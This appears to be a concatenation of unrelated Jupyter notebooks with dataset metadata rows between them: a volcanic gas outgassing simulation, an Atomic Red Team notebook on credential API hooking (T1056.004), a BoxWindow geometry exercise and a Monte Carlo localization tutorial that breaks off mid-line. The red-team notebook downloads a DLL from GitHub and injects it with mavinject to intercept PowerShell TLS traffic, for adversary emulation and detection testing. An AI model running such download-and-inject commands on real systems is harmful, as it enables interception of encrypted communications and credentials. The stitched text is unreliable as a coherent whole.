"# The total H and C mass fractions\nmCO2tot=1000e-6\nmH2Otot=1000e-6\n\n# set total pressure and temperature\nT = 1473 # kelvin\nP = 1000 # bar\nx = 0.01550152865954013\nFMQ = 0\n\n# set the Oxygen fugacity to FMQ\nA = 25738\nB = 9\nC = 0.092\nlog_FMQ = (-A/T+B+C*(P-1)/T)\nf_O2 = 10**(log_FMQ+FMQ)\n# set to FMQ\n\nstart = time.time()\nP_H2O,P_H2,P_CO2,P_CO,P_CH4,alphaG,x_CO2,x_H2O = solve_gases(T,P,f_O2,mCO2tot,mH2Otot)\nprint(time.time()-start)\nprint('H2O mix rat =','%.2e'%(P_H2O/P))\nprint('H2 mix rat =','%.2e'%(P_H2/P))\nprint('CO2 mix rat =','%.2e'%(P_CO2/P))\nprint('CO mix rat =','%.2e'%(P_CO/P))\nprint('CH4 mix rat =','%.2e'%(P_CH4/P))\nprint('alphaG =','%.2e'%alphaG)",
"0.14644694328308105\nH2O mix rat = 1.68e-03\nH2 mix rat = 3.52e-05\nCO2 mix rat = 9.49e-01\nCO mix rat = 4.89e-02\nCH4 mix rat = 8.13e-12\nalphaG = 4.53e-04\n"
],
[
"# make distributions\nnp.random.seed(1)\nn = 10000\n\ninputs = range(0,n)\n\n# change these too\nmCO2toto_r=[-5,-2] # Approximate range in Earth MORB Wallace and Anderson 1999, Marty et al. 2012, Wallace 2005\nmH2Ototo_r=[-5,-1] # Dissolved submarine range for Earth Wallace and Anderson 1999\n # Figure 10\nmCO2totc_r=[-5,-2] # Approximate range in Earth MORB Wallance and Anderson 1999, Marty et al. 2012, Wallace 2005\nmH2Ototc_r=[-5,-1] # Dissolved subaerial range for Earth Wallace and Anderson 1999\n # Figure 11\nmCO2toto = 10**np.random.uniform(low=mCO2toto_r[0], high=mCO2toto_r[1], size=n)\nmH2Ototo = 10**np.random.uniform(low=mH2Ototo_r[0], high=mH2Ototo_r[1], size=n)\nmCO2totc = 10**np.random.uniform(low=mCO2totc_r[0], high=mCO2totc_r[1], size=n)\nmH2Ototc = 10**np.random.uniform(low=mH2Ototc_r[0], high=mH2Ototc_r[1], size=n)\n#mCO2totc = mCO2toto\n#mH2Ototc = 10**mH2Ototo\n\n# Choose range of T and P and fO2\nTc_r = [873,1973] # coldest magmas to Komatiite magmas ( ,Huppert et al. 1984)\nPc_r = [1e-3,100] # Roughly subaerial degassing pressure range in the solar system\nTo_r = [873,1973] # coldest magmas to Komatiite magmas ( ,Huppert et al. 1984)\nPo_r = [100,1000] # Magma solubility doesn't allow for siginifcant degassing at higher pressure\nf_O2_r = [-4,5] # Range of O2 fugacities observed on Earth (Stamper et al. 2014)\n # White dwarfs pollution are evidence that similar O2 fuagacities on exoplanets (Doyle et al. 2019)\n # encompasses O2 fugacity of martian meteorites (Catling and Kasting 2017)\nX_r = [0,1] # 0% to 100% subaerial volcanism\n\nLG = 1\nDelta_f_O2 = np.random.uniform(low=f_O2_r[0], high=f_O2_r[1], size=n)\nTc = np.random.uniform(low=Tc_r[0], high=Tc_r[1], size=n)\nPc = np.random.uniform(low=Pc_r[0], high=Pc_r[1], size=n)\nTo = np.random.uniform(low=To_r[0], high=To_r[1], size=n)\nPo = np.random.uniform(low=Po_r[0], high=Po_r[1], size=n)\nX = np.random.uniform(low=X_r[0], high=X_r[1], size=n)\nif LG==1:\n # log stuff\n Pc_r = [np.log10(Pc_r[0]),np.log10(Pc_r[1])]\n Pc = 10**np.random.uniform(low=Pc_r[0], high=Pc_r[1], size=n)\n\n\n# little bit more to get f_O2\nA = 25738\nB = 9\nC = 0.092\nlog_fO2_c = (-A/Tc+B+C*(Pc-1)/Tc)+Delta_f_O2\nf_O2_c = 10**(log_fO2_c)\n\nlog_fO2_o = (-A/To+B+C*(Po-1)/To)+Delta_f_O2\nf_O2_o = 10**(log_fO2_o)",
"_____no_output_____"
],
[
"# ocean world \ndef flux_ratios_iter(T,P,f_O2,mCO2tot,mH2Otot):\n P_H2O,P_H2,P_CO2,P_CO,P_CH4,alphaG,x_CO2,x_H2O = solve_gases(T,P,f_O2,mCO2tot,mH2Otot)\n #CO_CO2 = P_CO/P_CO2\n try:\n CO_CO2 = P_CO2/P_CO\n CO_CH4 = P_CH4/P_CO\n except:\n CO_CO2 = np.nan\n CO_CH4 = np.nan\n# CO2 = 1000*alphaG*x*(1/(1-alphaG))*P_CO2/P\n# CH4 = 1000*alphaG*x*(1/(1-alphaG))*P_CH4/P\n# CO = 1000*alphaG*x*(1/(1-alphaG))*P_CO/P\n\n if P_H2O==0:\n print('hi')\n \n CO2 = 1000*alphaG*x*P_CO2/P\n CH4 = 1000*alphaG*x*P_CH4/P\n CO = 1000*alphaG*x*P_CO/P\n \n\n return (CO_CO2,CO_CH4,CO,CH4,CO2)\n\nnum_cores = multiprocessing.cpu_count()\nstart = time.time()\nresultso = Parallel(n_jobs=num_cores)(delayed(flux_ratios_iter)\\\n (To[i],Po[i],f_O2_o[i],mCO2toto[i],mH2Ototo[i]) for i in tqdm(inputs))\nend = time.time()\nprint(end-start)\n\nresultso = np.array(resultso)",
"100%|██████████| 10000/10000 [00:22<00:00, 436.10it/s]\n"
],
[
"# mix land-ocean world\ndef flux_ratios_iter(To,Tc,Po,Pc,f_O2_o,f_O2_c,mCO2toto,mH2Ototo,mCO2totc,mH2Ototc,X):\n P_H2O_o,P_H2_o,P_CO2_o,P_CO_o,P_CH4_o,alphaG_o,x_CO2_o,x_H2O_o = solve_gases(To,Po,f_O2_o,mCO2toto,mH2Ototo) \n P_H2O_c,P_H2_c,P_CO2_c,P_CO_c,P_CH4_c,alphaG_c,x_CO2_c,x_H2O_c = solve_gases(Tc,Pc,f_O2_c,mCO2totc,mH2Ototc)\n \n \n # this gives mol gas/kg magma\n# CO2_b = X*(1000*alphaG_c*x*(1/(1-alphaG_c))*P_CO2_c/Pc)+(1-X)*(1000*alphaG_o*x*(1/(1-alphaG_o))*P_CO2_o/Po)\n# CO_b = X*(1000*alphaG_c*x*(1/(1-alphaG_c))*P_CO_c/Pc)+(1-X)*(1000*alphaG_o*x*(1/(1-alphaG_o))*P_CO_o/Po)\n# CH4_b = X*(1000*alphaG_c*x*(1/(1-alphaG_c))*P_CH4_c/Pc)+(1-X)*(1000*alphaG_o*x*(1/(1-alphaG_o))*P_CH4_o/Po)\n \n CO2_b = X*(1000*alphaG_c*x*P_CO2_c/Pc)+(1-X)*(1000*alphaG_o*x*P_CO2_o/Po)\n CO_b = X*(1000*alphaG_c*x*P_CO_c/Pc)+(1-X)*(1000*alphaG_o*x*P_CO_o/Po)\n CH4_b = X*(1000*alphaG_c*x*P_CH4_c/Pc)+(1-X)*(1000*alphaG_o*x*P_CH4_o/Po)\n \n # this gives mol gas/kg magma\n P_CO2_b = X*(P_CO2_c/Pc)+(1-X)*(P_CO2_o/Po)\n P_CO_b = X*(P_CO_c/Pc)+(1-X)*(P_CO_o/Po)\n P_CH4_b = X*(P_CH4_c/Pc)+(1-X)*(P_CH4_o/Po)\n\n try:\n CO_CO2 = P_CO2_b/P_CO_b\n CO_CH4 = P_CH4_b/P_CO_b\n \n except:\n CO_CO2 = np.nan\n CO_CH4 = np.nan\n \n# CO_CO2 = X*(P_CO_c/P_CO2_c)+(1-X)*(P_CO_o/P_CO2_o)\n# CO_CH4 = X*(P_CO_c/P_CH4_c)+(1-X)*(P_CO_o/P_CH4_o)\n\n return (CO_CO2,CO_CH4,CO_b,CH4_b,CO2_b)\n\nnum_cores = multiprocessing.cpu_count()\nstart = time.time()\nresultsb = Parallel(n_jobs=num_cores)(delayed(flux_ratios_iter)\\\n (To[i],Tc[i],Po[i],Pc[i],f_O2_o[i],f_O2_c[i],mCO2toto[i],mH2Ototo[i],mCO2totc[i],mH2Ototc[i],X[i]) for i in tqdm(inputs))\nend = time.time()\nprint(end-start)\n\nresultsb = np.array(resultsb)",
"100%|██████████| 10000/10000 [00:31<00:00, 317.07it/s]\n"
],
[
"#np.savetxt('ocean_world.txt',resultso)\n#resultso = np.loadtxt('ocean_world.txt')\n\n#np.savetxt('ocean_continent_combo.txt',resultsb)\n#resultsb = np.loadtxt('ocean_continent_combo.txt')",
"_____no_output_____"
],
[
"plt.rcParams.update({'font.size': 18})\n\n\nfig,[ax,ax1] = plt.subplots(1,2,figsize=[15,5])\nresults = resultsb\n# xbins = np.linspace(np.log10(min(results[:,1])), np.log10(max(results[:,1])), 20)\n# ybins = np.linspace(np.log10(min(results[:,0])), np.log10(max(results[:,0])), 20)\nxbins = np.linspace(-27,5, 20)\nybins = np.linspace(-1, 5, 20)\n\ncounts1, _, _ = np.histogram2d(np.log10(results[:,1]), np.log10(results[:,0]), bins=(xbins, ybins),normed=True)\ncs1 = ax1.pcolormesh(xbins, ybins, counts1.T,vmin=0, vmax=np.max(counts1))\n#ax1.set_ylabel(r\"$\\log(\\mathrm{CO}/\\mathrm{CO_2})$\")\n#ax1.set_xlabel(r\"$\\log(\\mathrm{CO}/\\mathrm{CH_4})$\")\nax1.set_ylabel(r\"$\\log(\\mathrm{CO_2}/\\mathrm{CO})$\")\nax1.set_xlabel(r\"$\\log(\\mathrm{CH_4}/\\mathrm{CO})$\")\n#ax1.set_xticks(np.arange(0,22,5))\n#cbar1 = plt.colorbar(cs1,ax=ax1)\n#cbar1.set_label(\"Probability density\")\n\n\nfig.subplots_adjust(right=0.8)\ncbar_ax = fig.add_axes([0.82, 0.13, 0.02, 0.74])\ncbar = fig.colorbar(cs1, cax=cbar_ax)\n\nresults = resultso\n# xbins = np.linspace(np.log10(min(results[:,1])), np.log10(max(results[:,1])), 20)\n# ybins = np.linspace(np.log10(min(results[:,0])), np.log10(max(results[:,0])), 20)\nxbins = np.linspace(-27,5, 20)\nybins = np.linspace(-1, 5, 20)\n#counts, _, _ = np.histogram2d(np.log10(results[:,1]), np.log10(results[:,0]), bins=(xbins, ybins),normed=True)\n#cs = ax.pcolormesh(xbins, ybins, counts.T,vmin=0, vmax=np.max(counts1))\nax.hist2d(np.log10(results[:,1]), np.log10(results[:,0]),bins=(xbins, ybins),normed=True,vmax=np.max(counts1))\n#ax.set_ylabel(r\"$\\log(\\mathrm{CO}/\\mathrm{CO_2})$\")\n#ax.set_xlabel(r\"$\\log(\\mathrm{CO}/\\mathrm{CH_4})$\")\nax.set_ylabel(r\"$\\log(\\mathrm{CO_2}/\\mathrm{CO})$\")\nax.set_xlabel(r\"$\\log(\\mathrm{CH_4}/\\mathrm{CO})$\")\n#cbar = plt.colorbar(cs,ax=ax)\ncbar.set_label(\"Normalized count\")\n#ax.set_xticks(np.arange(0,22,5))\nplt.subplots_adjust(wspace=.3)\n\nax.text(-0.15, 1.15, '(a)', transform=ax.transAxes,size=25)\nax1.text(-0.15, 1.15, '(b)', transform=ax1.transAxes,size=25)\n\nax.set_ylim(ax.get_ylim()[0],ax.get_ylim()[1])\nax.set_xlim(ax.get_xlim()[0],ax.get_xlim()[1])\nax1.set_ylim(ax1.get_ylim()[0],ax1.get_ylim()[1])\nax1.set_xlim(ax1.get_xlim()[0],ax1.get_xlim()[1])\nax.text(0.02, 0.05, 'Ocean world', transform=ax.transAxes,color='w')\nax1.text(0.02, 0.05, 'Earth-like world', transform=ax1.transAxes,color='w')\nxxx = np.linspace(-40,10)\nax.plot(xxx,xxx*0,'w:')\nax.plot(xxx*0,xxx,'w:')\n\nax1.plot(xxx,xxx*0,'w:')\nax1.plot(xxx*0,xxx,'w:')\n\nnum_nan = np.sum(np.isnan(resultso[:,1]))\nprint('fraction of Ocean world calculations where CH4/CO2>1 = ',\\\n len(np.where(resultso[:,1][~np.isnan(resultso[:,1])]>1)[0])/(n-num_nan))\n\nnum_nan = np.sum(np.isnan(resultsb[:,1]))\nprint('fraction of Earth-like world calculations where CH4/CO2>1 = ',\\\n len(np.where(resultsb[:,1][~np.isnan(resultsb[:,1])]>1)[0])/(n-num_nan))\n\n\n# ax.set_xlim(-27,5)\n# ax.set_ylim(-1,5)\n\n# plt.savefig(\"both.pdf\",bbox_inches='tight')\n\nplt.show()",
"fraction of Ocean world calculations where CH4/CO2>1 = 0.06612492033142128\nfraction of Earth-like world calculations where CH4/CO2>1 = 0.01645429918731815\n"
],
[
"plt.rcParams.update({'font.size': 18})\nmod_earth = 30*3000*1e9\n\nfig,[[ax2,ax3],[ax4,ax5]] = plt.subplots(2,2,figsize=[14,10])#,gridspec_kw={'height_ratios':[3,2]})\n\n#ax.set_xticks(np.arange(0,22,5))\nplt.subplots_adjust(wspace=.3,hspace=.35)\n\n# ax.text(-0.15, 1.10, '(a)', transform=ax.transAxes,size=25)\n# ax1.text(-0.15, 1.10, '(b)', transform=ax1.transAxes,size=25)\nax2.text(-0.15, 1.10, '(a)', transform=ax2.transAxes,size=25)\nax3.text(-0.15, 1.10, '(b)', transform=ax3.transAxes,size=25)\nax4.text(-0.15, 1.10, '(c)', transform=ax4.transAxes,size=25)\nax5.text(-0.15, 1.10, '(d)', transform=ax5.transAxes,size=25)\n\n# ax.text(0.02, 0.05, 'Ocean world', transform=ax.transAxes,color='w')\n# ax1.text(0.02, 0.05, 'Earth-like world', transform=ax1.transAxes,color='w')\nax2.text(0.02, 0.89, 'Ocean world', transform=ax2.transAxes,color='k')\nax3.text(0.02, 0.89, 'Earth-like world', transform=ax3.transAxes,color='k')\nax4.text(0.02, 0.89, 'Ocean world', transform=ax4.transAxes,color='k')\nax5.text(0.02, 0.89, 'Earth-like world', transform=ax5.transAxes,color='k')\n\nax4.arrow\n\n\n#plt.savefig(\"both.pdf\",bbox_inches='tight')\n\n# now other things\n\nbins = np.arange(-32,2,1.5)\nax2.set_xticks(np.arange(-32,1,6))\nax3.set_xticks(np.arange(-32,1,6))\nax2.hist(np.log10(resultso[:,3]),bins = bins,normed=True)\nax2.set_ylabel('Normalized count')\nax2.set_xlabel('log(mol $\\mathrm{CH_4}$/kg magma)')\n\nax3.hist(np.log10(resultsb[:,3]),bins = bins,normed=True)\nax3.set_ylabel('Normalized count')\nax3.set_xlabel('log(mol $\\mathrm{CH_4}$/kg magma)')\n\nax2.set_xlim(ax2.get_xlim()[0],ax2.get_xlim()[1])\nax3.set_xlim(ax2.get_xlim()[0],ax2.get_xlim()[1])\n\nax2.set_ylim(ax3.get_ylim()[0],ax3.get_ylim()[1])\nax3.set_ylim(ax3.get_ylim()[0],ax3.get_ylim()[1])\n\nax2.set_yticks([0.,0.02,0.04,0.06])\nax3.set_yticks([0.,0.02,0.04,0.06])\n\n# now gas fluxes\nbins1 = np.arange(-31,8,1.5)\nax4.set_xticks(np.arange(-30,2,6))\nax5.set_xticks(np.arange(-30,2,6))\nax4.hist(np.log10(resultso[:,3]*mod_earth/1e12),bins = bins1,normed=True)\n\nax4.set_ylabel('Normalized count')\nax4.set_xlabel('Methane flux (log(Tmol/yr))')\n\nax5.hist(np.log10(resultsb[:,3]*mod_earth/1e12),bins = bins1,normed=True)\n\nax5.set_ylabel('Normalized count')\nax5.set_xlabel('Methane flux (log(Tmol/yr))')\n\nax4.set_xlim(ax4.get_xlim()[0],3.5)\n\nax4.set_xlim(ax4.get_xlim()[0],ax4.get_xlim()[1])\nax5.set_xlim(ax4.get_xlim()[0],ax4.get_xlim()[1])\n\nax4.set_ylim(ax5.get_ylim()[0],ax5.get_ylim()[1])\nax5.set_ylim(ax5.get_ylim()[0],ax5.get_ylim()[1])\n\nax4.set_yticks([0.,0.02,0.04,0.06])\nax5.set_yticks([0.,0.02,0.04,0.06])\n\n\nEbio = 30\nlims = ax4.get_xlim()\nval = ((lims[1]-lims[0])-(lims[1]-np.log10(Ebio)))/(lims[1]-lims[0])\nax4.text(val,.71,'Mod.\\nEarth\\nbio.\\nflux',ha='center',va='bottom', transform=ax4.transAxes,fontsize = 12)\nax4.arrow(val, .7, 0, -0.69, transform=ax4.transAxes, length_includes_head=True\\\n ,head_width = .03,fc='k')\n\nlims = ax5.get_xlim()\nval = ((lims[1]-lims[0])-(lims[1]-np.log10(Ebio)))/(lims[1]-lims[0])\nax5.text(val,.61,'Mod.\\nEarth\\nbio.\\nflux',ha='center',va='bottom', transform=ax5.transAxes,fontsize = 12)\nax5.arrow(val, .6, 0, -0.59, transform=ax5.transAxes, length_includes_head=True\\\n ,head_width = .03,fc='k')\n\n\n\nvolc_flux = 1\nprint('Fraction ocean world calulations where CH4 > 10 Tmol assuming\\n'+str(volc_flux)+\\\n ' times Earths magma production rate =',1-(np.sum(resultso[:,3]*volc_flux*mod_earth/1e12 < 10))/n)\nprint()\nprint('Fraction Earth-like world calulations where CH4 > 10 Tmol assuming\\n'+str(volc_flux)+\\\n ' times Earths magma production rate =',1-(np.sum(resultsb[:,3]*volc_flux*mod_earth/1e12 < 10))/n)\n\n# plt.savefig(\"CH4_prod.pdf\",bbox_inches='tight')\nplt.show()",
"Fraction ocean world calulations where CH4 > 10 Tmol assuming\n1 times Earths magma production rate = 0.0018000000000000238\n\nFraction Earth-like world calulations where CH4 > 10 Tmol assuming\n1 times Earths magma production rate = 0.0004999999999999449\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb5312f8bf6e2062d5dad38bb0e8ab66c831e9e3 | 5,068 | ipynb | Jupyter Notebook | playbook/tactics/credential-access/T1056.004.ipynb | haresudhan/The-AtomicPlaybook | 447b1d6bca7c3750c5a58112634f6bac31aff436 | [
"MIT"
] | 8 | 2021-05-25T15:25:31.000Z | 2021-11-08T07:14:45.000Z | playbook/tactics/credential-access/T1056.004.ipynb | haresudhan/The-AtomicPlaybook | 447b1d6bca7c3750c5a58112634f6bac31aff436 | [
"MIT"
] | 1 | 2021-08-23T17:38:02.000Z | 2021-10-12T06:58:19.000Z | playbook/tactics/credential-access/T1056.004.ipynb | haresudhan/The-AtomicPlaybook | 447b1d6bca7c3750c5a58112634f6bac31aff436 | [
"MIT"
] | 2 | 2021-05-29T20:24:24.000Z | 2021-08-05T23:44:12.000Z | 58.930233 | 1,312 | 0.719613 | [
[
[
"# T1056.004 - Input Capture: Credential API Hooking\nAdversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:\n\n* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Endgame Process Injection July 2017)\n* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Endgame Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)\n* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Endgame Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)\n",
"_____no_output_____"
],
[
"## Atomic Tests",
"_____no_output_____"
]
],
[
[
"#Import the Module before running the tests.\n# Checkout Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts.\nImport-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force",
"_____no_output_____"
]
],
[
[
"### Atomic Test #1 - Hook PowerShell TLS Encrypt/Decrypt Messages\nHooks functions in PowerShell to read TLS Communications\n\n**Supported Platforms:** windows\nElevation Required (e.g. root or admin)\n#### Dependencies: Run with `powershell`!\n##### Description: T1056.004x64.dll must exist on disk at specified location (#{file_name})\n\n##### Check Prereq Commands:\n```powershell\nif (Test-Path PathToAtomicsFolder\\T1056.004\\bin\\T1056.004x64.dll) {exit 0} else {exit 1}\n\n```\n##### Get Prereq Commands:\n```powershell\nNew-Item -Type Directory (split-path PathToAtomicsFolder\\T1056.004\\bin\\T1056.004x64.dll) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll\" -OutFile \"PathToAtomicsFolder\\T1056.004\\bin\\T1056.004x64.dll\"\n\n```",
"_____no_output_____"
]
],
[
[
"Invoke-AtomicTest T1056.004 -TestNumbers 1 -GetPreReqs",
"_____no_output_____"
]
],
[
[
"#### Attack Commands: Run with `powershell`\n```powershell\nmavinject $pid /INJECTRUNNING PathToAtomicsFolder\\T1056.004\\bin\\T1056.004x64.dll\ncurl https://www.example.com\n```",
"_____no_output_____"
]
],
[
[
"Invoke-AtomicTest T1056.004 -TestNumbers 1",
"_____no_output_____"
]
],
[
[
"## Detection\nMonitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)\n\nRootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.\n\nVerify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb531baf72b0cf3e8c3171cbd5365c107a79674e | 8,426 | ipynb | Jupyter Notebook | src/lab2/Untitled.ipynb | EmilieYip/sdia-python | 0751b803ca20481a99410bb72c8649005e2c3804 | [
"MIT"
] | 1 | 2021-09-15T06:04:50.000Z | 2021-09-15T06:04:50.000Z | src/lab2/Untitled.ipynb | EmilieYip/sdia-python | 0751b803ca20481a99410bb72c8649005e2c3804 | [
"MIT"
] | null | null | null | src/lab2/Untitled.ipynb | EmilieYip/sdia-python | 0751b803ca20481a99410bb72c8649005e2c3804 | [
"MIT"
] | null | null | null | 22.057592 | 117 | 0.424519 | [
[
[
"#from lab2.utils import get_random_number_generator\n\n\nclass BoxWindow:\n \"\"\"[summary]\"\"\"\n\n def __init__(self, args):\n \"\"\"initialize the box window with the bounding points\n\n Args:\n args (np.array([integer])): array of the bounding points of the box\n \"\"\"\n self.bounds = args\n\n def __str__(self):\n r\"\"\"BoxWindow: :math:`[a_1, b_1] \\times [a_2, b_2] \\times \\cdots`\n\n Returns:\n str : give the bounds of the box\n \"\"\"\n mot=\"\"\n for k in range(len(self.bounds)):\n mot = mot+'['+str(self.bounds[k][0])+', '+ str(self.bounds[k][0])+']' \n if k != len(self.bounds)-1:\n mot=mot+' x '\n \n return (\"BoxWindow: \" + mot)\n\n def __len__(self):\n L=[]\n for k in range(len(self.bounds)):\n L.append(self.bounds[k][1]-self.bounds[k][0])\n return L\n\n def __contains__(self, args):\n \"\"\"args: coordonnées de point\"\"\"\n for p in range(len(args)):\n if args[p]<self.bounds[p][1] and args[p]>self.bounds[p][0]:\n continue\n else:\n return False\n return True\n \n# a=self.bounds[:,0]\n# b=self.bounds[:,1]\n# return all(np.logical_and(a<= point, point<=b))\n \n\n def dimension(self):\n \"\"\"[summary]\"\"\"\n return (len(self.bounds))\n\n def volume(self):\n \"\"\"[summary]\"\"\"\n vol=1\n for p in self.__len__():\n vol=vol*p\n return vol\n\n def indicator_function(self, args):\n \"\"\"[summary]\n\n Args:\n args ([type]): [description]\n \"\"\"\n if self.__contains__(args)==True:\n return (1)\n else:\n return (0)\n \n\n def rand(self, n=1, rng=None):\n \"\"\"Generate ``n`` points uniformly at random inside the :py:class:`BoxWindow`.\n\n Args:\n n (int, optional): [description]. Defaults to 1.\n rng ([type], optional): [description]. Defaults to None.\n \"\"\"\n rng = get_random_number_generator(rng)\n \n L=[]\n for p in range(n):\n L_petit=[]\n for k in range(len(self.bounds)):\n if self.bounds[k][0]==self.bounds[k][1]:\n L_petit.append(self.bounds[k][0])\n else:\n L_petit.append(np.random.uniform(self.bounds[k][1]-self.bounds[k][0])+self.bounds[k][0])\n L.append(L_petit)\n\n return (L)\n\n\n#heritage\nclass UnitBoxWindow(BoxWindow):\n def __init__(self, center, dimension):\n \"\"\"[summary]\n\n Args:\n dimension ([type]): [description]\n center ([type], optional): [description]. Defaults to None.\n \"\"\"\n super(BoxWindow, self).__init__(args)\n\n\n\n",
"_____no_output_____"
],
[
"import numpy as np\n\n\ndef get_random_number_generator(seed):\n \"\"\"Turn seed into a np.random.Generator instance.\"\"\"\n return np.random.default_rng(seed)",
"_____no_output_____"
],
[
"np.random.uniform(0)",
"_____no_output_____"
],
[
"import numpy as np\nc=BoxWindow(np.array([[2.5, 2.5]]))\nd=BoxWindow(np.array([[0, 5], [-1.45, 3.14], [-10, 10]]))",
"_____no_output_____"
],
[
"d.bounds.shape",
"_____no_output_____"
],
[
"d.bounds[0][1]",
"_____no_output_____"
],
[
"c.rand()",
"_____no_output_____"
],
[
"point1=[-1,1,1]\npoint2=[1,1,1]",
"_____no_output_____"
],
[
"d.__contains__(point1)",
"_____no_output_____"
],
[
"d.indicator_function(point1)",
"_____no_output_____"
],
[
"d.__len__()",
"_____no_output_____"
],
[
"d.volume()",
"_____no_output_____"
],
[
"d.__str__()",
"_____no_output_____"
],
[
"c.__str__()",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb5328c6fc80d2d0c02ceeefaa9e3c8899eaddb2 | 400,398 | ipynb | Jupyter Notebook | monte_calro_localization/monte_calro_localization.ipynb | Kuwamai/probrobo_note | 9848473c155a116ed78a2fae52c1d8da001dda88 | [
"MIT"
] | null | null | null | monte_calro_localization/monte_calro_localization.ipynb | Kuwamai/probrobo_note | 9848473c155a116ed78a2fae52c1d8da001dda88 | [
"MIT"
] | null | null | null | monte_calro_localization/monte_calro_localization.ipynb | Kuwamai/probrobo_note | 9848473c155a116ed78a2fae52c1d8da001dda88 | [
"MIT"
] | null | null | null | 696.344348 | 25,612 | 0.934308 | [
[
[
"# Monte calro localization \nMonte calro localizationのサンプルです。 ",
"_____no_output_____"
],
[
"## ライブラリのインポート",
"_____no_output_____"
]
],
[
[
"%matplotlib inline\nimport math, random # 計算用、乱数の生成用ライブラリ\nimport matplotlib.pyplot as plt # 描画用ライブラリ",
"_____no_output_____"
]
],
[
[
"## ランドマーククラス \n下のグラフに表示されている星たちです。 \nロボットはこの星を目印にして自分の位置を知ります。 \n今回は星の位置もロボットが覚えている設定です。 \nロボットがどんな風に星を見ているのかは、観測モデルのクラスを見てください。 ",
"_____no_output_____"
]
],
[
[
"class Landmarks:\n def __init__(self, array):\n self.positions = array # array = [[星1のx座標, 星1のy座標], [星2のx座標, 星2のy座標]...]\n \n def draw(self):\n # ランドマークの位置を取り出して描画\n xs = [e[0] for e in self.positions]\n ys = [e[1] for e in self.positions]\n plt.scatter(xs,ys,s=300,marker=\"*\",label=\"landmarks\",color=\"orange\")",
"_____no_output_____"
]
],
[
[
"## 移動モデル \nfwだけ前に進んで、rotだけ回転します。 \nロボットは正確に走らないし、滑ったりもするので、random.gaussによって擬似的に表現します。 \n実際のロボットでは、試しに動かしてみることで、動きの正確さや傾向を調べておきます。 ",
"_____no_output_____"
]
],
[
[
"def Movement(pos, fw, rot):\n # 移動モデル\n # posからfw前進、rot回転した位置をリストで返す\n \n # 雑音の入った前進、回転の動き\n actual_fw = random.gauss(fw, fw/10) # 10%の標準偏差でばらつく\n actual_rot = random.gauss(rot, rot/10) # 10%の標準偏差でばらつく\n dir_error = random.gauss(0.0, math.pi / 180.0 * 3.0) # 3[deg]の標準偏差\n \n # 異動前の位置を保存\n px, py, pt = pos\n\n # 移動後の位置を計算\n x = px + actual_fw * math.cos(pt + dir_error)\n y = py + actual_fw * math.sin(pt + dir_error)\n t = pt + dir_error + actual_rot # dir_errorを足す\n\n # 結果を返す\n return [x,y,t]",
"_____no_output_____"
]
],
[
[
"## 観測モデル \nランドマーククラスで指定した☆を一個ずつ見ます。 \nロボットには自分から見た☆の距離と方向がわかります。 \nこちらも移動モデル同様に正確には読み取れないので、random.gaussで再現します。 \n今回のロボットの視野角は180度、距離は1まで見れます。 ",
"_____no_output_____"
]
],
[
[
"def Observation(pos, landmark):\n # 観測モデル\n # posから見えるランドマークの距離と方向をリストで返す\n \n obss = []\n \n # センサの計測範囲\n # 距離0.1 ~ 1\n # 角度90 ~ -90[deg]\n sensor_max_range = 1.0\n sensor_min_range = 0.1\n sensor_max_angle = math.pi / 2\n sensor_min_angle = -math.pi / 2\n \n # ロボットやパーティクルの位置姿勢を保存\n rx, ry, rt = pos\n \n # ランドマークごとに観測\n for lpos in landmark.positions:\n true_lx, true_ly = lpos\n # 観測が成功したらresultをTrue\n result = True\n\n # ロボットとランドマークの距離を計算\n # センサの範囲外であればresultがFalseに\n distance = math.sqrt((rx - true_lx) ** 2 + (ry - true_ly) ** 2)\n if distance > sensor_max_range or distance < sensor_min_range:\n result = False\n\n # ロボットから見えるランドマークの方向を計算\n # こちらもセンサの範囲外であればresultがFalseに\n direction = math.atan2(true_ly - ry, true_lx - rx) - rt\n if direction > math.pi: direction -= 2 * math.pi\n if direction < - math.pi: direction += 2 * math.pi\n if direction 